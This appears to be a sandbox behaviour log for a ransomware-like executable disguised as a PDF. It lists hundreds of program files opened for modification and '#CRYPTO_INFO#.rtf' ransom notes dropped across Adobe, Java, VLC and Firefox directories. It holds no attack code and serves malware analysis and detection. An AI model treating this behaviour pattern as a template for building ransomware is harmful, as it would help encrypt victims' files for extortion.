Sign White Paper.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaBrightItalic.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_shared_multi_filetype.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME-JAVAFX.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_radio_selected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\nb-no\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\sfs_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management\jmxremote.access 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\illustrations_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\print_poster.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.catalog 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\uk.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\compare_poster.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\AddressBook.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\external_extensions.json 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluDCFilesEmpty_180x180.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\th_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\images\example_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\tool-view.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_tr_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jar.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-Bold.otf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\circle_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Regular.otf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-javahelp.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\java.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine_2.3.0.v20140506-1720.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\sunmscapi.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javafxpackager.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console_1.0.300.v20131113-1212.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\nacl_irt_x86_64.nexe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-de_de_2x.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-down.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\ktab.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen-press.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\rename.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_up_selected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\LICENSE 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\UnifiedShare.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_CopyDrop32x32.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Microsoft.VCLibs.x86.14.00.appx 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security.ui_1.1.200.v20130626-2037.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\logo_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\standards_poster.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\local_policy.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\download.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files 